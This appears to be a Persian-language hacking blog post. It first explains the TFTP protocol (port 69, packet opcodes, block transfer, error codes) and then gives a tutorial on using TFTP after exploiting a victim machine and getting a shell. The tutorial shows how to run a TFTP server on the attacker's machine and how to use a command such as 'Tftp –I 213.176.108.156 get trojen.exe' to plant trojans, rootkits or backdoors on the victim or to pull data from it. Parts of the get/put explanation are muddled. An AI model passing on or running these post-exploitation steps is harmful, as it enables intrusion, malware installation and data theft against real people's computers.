TFTP خلاصه Trivial File Transfer Protocol است که بر روی پورت 69 کار می
کند. تفاوت آن با FTP در اینست که FTP از TCP استفده می کند ولی TFTP ازUDP
استفاده می کند که البته FTP دارای ثبات و اطمینان قابل قبولی هست در
صورتی که TFTP سرعت را برای ما به ارمغان می آورد. نکته جالب توجه در این
است که TFTP احتیاجی به پسورد ندارد. جابجایی در اینجا بدین شکل است که
client از server در خواست (نوشتن)write یا (خواندن)read می کند که معمولا
همان درخواست Read (PRQ) مورد قبول واقع می شود و با قبول شدن در خواست از
سوی سرور ارتباط میان آن دو بر قرار می گردد و جایجایی اطلاعات آغاز می
گردد. در ترانسفر packet/block جابجایی تا 512بایت آنجام شده و سپس سرور
منتظر جواب دریافت(ACK) از سوی کلاینت میشود و بعد از دریافت جواب دوباره
512 بایت یعدی را می فرستد و برای هر 512بایت این کار تکرار میشود . هر یک
از بلاک های دریافتی به انتهای بلاک قبلی متصل میشود اگر در این حین یکی از
packet گم گردد هر دوی کلاینت و سرور یک time-out ایجاد نموده و دوباره
همان packet گم شده را ارسال می کند. همیشه فرستنده باید آخرین بلاک را در
حافظه نگهداری نمایید تا زمانی که پیام ACK را دریافت نماید البته اگر
آخرین بلاک از فایل باشد دیگر احتیاجی به صبر کردن و نگهداری بر روی حافظه
نیست. 0 mode 0 Filename 01 پیام های TFTP خواندن پیام در خواست 01 نشان
دهنده 2 بایت از دستور OPcode network byte که طرف مقابل می گویید این یک
READمی باشد. Filename یک رشته null terminated ascii می باشد که نام فایل
را به همراه دارد. Mode یک رشته null terminated ascii می باشد که نوع
جابجایی را در خود دارد. نوشتن پیام در خواست 0 mode 0 Filename 02 توضیحان
این بخش هم مثل بالا می باشد با این تفاوت که 01 برای WRITE می باشد. TFTP
Data Packet / Message Data 0 to 512bytes Block # 03 03 2 بایت از دستور
OPcode network byte که می گوید در طرف مقبل داده ها قرار دارد. Block # 2
بایت از دستور bytes block number network byte Data 0 to 512bytes همه پکت
دیتا ها 512 یایت در خود دارند غیر از آخری جواب Block # 04 04 2 بایت از
دستور OPcode network byte که معلوم می کند برای طرف دیگر که ACK می باشد.
Block # 2 بایت از دستور block number network byte انواع Error ها 0
errstring errcode 05 05 2 بایت از دستور OPcode network byteکه به طرف
مقابل می گویید این یک Error می باشد. Errcode 2 بایت از دستور error code
network byte می باشد. Errstring یک رشته null terminated ascii error و
error code ها به ترتیب زیرند: 0 - Not defined. 1 - File not found. 2 -
Access violation. 3 - Disk full. 4 - Illegal TFTP operation. 5 - Unknown
port. 6 - File already exists. 7 - No such user و طریقه های TFTP
ترانسفر دو دسته می باشند: 1. netascii که برای انتقالtext فایل ها استفاده
شده که البته دو طرف باید برای دریافت و فرستادن به این روش آماده باشند
2. octet که برای انتقال فایل هایbinary مورد استفاده قرار می گیرد.
======
آموزش استفاده از Tftp .
Tftp ) (trivial file transfer Protocolپروتكلي ساده و جمع وجور براي
انتقال اطلاعات از طريق شبكه است به وسيله Noel Chiappa طراحي شده است و در
RFC 1350 در مورد اين پروتكل بحث شده .
TFTP تنها قابليت خواندن و نوشتن اطلاعات روي سرور راه دور را دارد. براي
اين منظور يعني انتقال اطلاعات روي سرور بايد از سرور TFTP كه TFTPd نام
دارد استفاده كرد يعني ابتدا روي كامپيوتري كه مي خواهيم به عنوان سرور عمل
كند TFTPd را RUN كرده بعد به وسيله TFTP عمليات انتقال و دريافت اطلاعات
را انجام دهيم مي توانيد از اين آدرس يك TFTPd دانلود كنيد
http://www.winagents.com/downloads/tftpsetup.exe
خوب حالا شما بايد نحوه كار اين سرور و كلاينت يعني tftp و tftpd را بياموزيد.
ما براي مثال وقتي كه يك كامپيوتر را به وسيلة اكسپلويتي هك مي كنيم يك شل
از آن كامپيوتر مي گيريم خوب در اين مرحله قطعا ما تمايل داريم كه يك سري
نرم افزار روي سيستم قرباني دانلود كنيم و سطح دسترسي خود را به سيستم
قرباني بالا ببريم يا يك سري اطلاعات از كامپيوتر قرباني بر روي سيستم خود
دانلود كنيم براي اين منظور بهترين و ساده ترين ابزار همين tftp است كه
همراه سيستم عامل نيز وجود دارد و در آدرس %systemroot%/system32/ قرار
دارد و شما وقتي كه يك شل گرفته ايد به راحتي مي توانيد ان را اجرا كنيد
ولي بايد در ابتدا يك tftpd روي سيستم خود اجرا كرده تا سيستم شما سروري
براي اين نرم افزار باشد براي اين منظور اگر همين tftpd كه در اين مقاله
لينك دانلودش قرار داده شده است استفاده كنيد بايد مراحل زير را انجام
دهيد:
ابتدا Tftpd32.exe را اجرا كنيد(شكل زير):
خوب در اين حال يك ايكون هم در قسمت systry سيستم شما ظاهر خواهد شد و اگر
firewall هم داشته باشيد از شما سوال مي كند كه اجازه مي دهيد كه اين نرم
افزار روي يك پرت listing شود شما درخواست را پاسخ مثبت دهيد و اين نرم
افزار روي پرت 69 به حالت گوش دهنده آماده به كار مي شود ولي بايد شما يك
تنظيم ديگر نيز انجام دهيد تا همه چيز آماده شود شما در اين مرحله بايد
base directory را نيز براي اين نرم افزار مشخص كنيد.
base directory چيست:
base directory دايركتوري است كه اين نرم افزار به عنوان دايركتوري براي
عمليات ارسال و دريافت از ان استفاده مي كند يعني اگر چيزي را دانلود كنيد
در اين دايركتوري قرار مي گيرد و اگر چيزي در اين پوشه باشد با ذكر نام آن
مي توانيد آن را upload كنيد براي مشخص كردن اين پوشه كه به طور پيش فرض
mydocument شما مي باشد بايد دكمه settings را كليك كنيد و در پنجره باز
شده(شكل زير
در قسمت بالي پنجره آدرس بيس دايركتوري خود را وارد كنيد و روي دكمه Ok
كليك كرده و ديگر همه چيز مهياست براي كار با قسمت كلاينت يعني خود TFTP .
Tftp يك نرم افزار تحت كنسول است يعني حالت متني دارد و در شل اجرا مي شود و
شما مي توانيد به راحتي از اين نرم افزار كه همراه كامپيوتر قرباني است
براي مقاصد خود استفاده كنيد صورت كلي اين نرم افزار بدين صورت است:
Tftp –I HostName [Get/Put] Source Destination
كه سويچ I ترتيب انقال فايل به صورت باينري رو مي ده (البته من مي گم
انتقال فايل دقيقا منظورم كلمه انتقال نيست بلكه فقط يك تصوير از فايل
ارسال مي شه مثل دستگاه فكس نه اينكه كل فايل از سرور move بشه روي اون
كامپيوتر و ديگر اثري از فايل روي سرور نباشه) اگر هم نوشته نشه فكر مي كنم
كه فايل به صورت اكتال انتقال داده مي شه در اين مورد دقيقا مطمئن نيستم.
HostName هم آدرس آي پي كامپيوتر سرور است يعني همون كامپيوتري كه TFTPD
روش Run شده get براي هنگامي است كه شما مي خواهيد يك فايل رو بفرستيد براي
كامپيوتر قرباني و put هنگامي استفاده ميشه كه بخواهيد يك فايل رو روي
كامپيوتر خود دانلود كنيد درست عكس زماني است كه شما روي كامپيوتر خود عمل
دانلود و آپلود رو انجام مي دهيد. Source آدرس فايل مورد نظر شما براي
عمليات آرسال يا دريافت است Destination هم آدرس مقصد است.
مثال:
Tftp –I 213.176.108.156 get trojen.exe c:trojen.exe
كه اين دستور باعث مي شه كه فايلي به اسم trojen.exe از basedirectory
كامپيوتري با ip 213.176.108.156 به درايو c: كامپيوتري كه دستور بالا در
اون اجرا شده كپي بشه.
به همين سادگي شما مي تونيد trojen , rootkit , backdoor و هر چيز دلخواه
ديگري روي كامپيوتر مورد نظر خود دانلود و يا هر اطلاعاتي كه نياز داريد از
آن آپلود كنيد.
مطالب مرتبط
ارسال نظر برای این مطلب
درباره ما
اطلاعات کاربری
نویسندگان
لینک دوستان
آرشیو
نظرسنجی
نظرتان در مورد هک ایران چیست
آمار سایت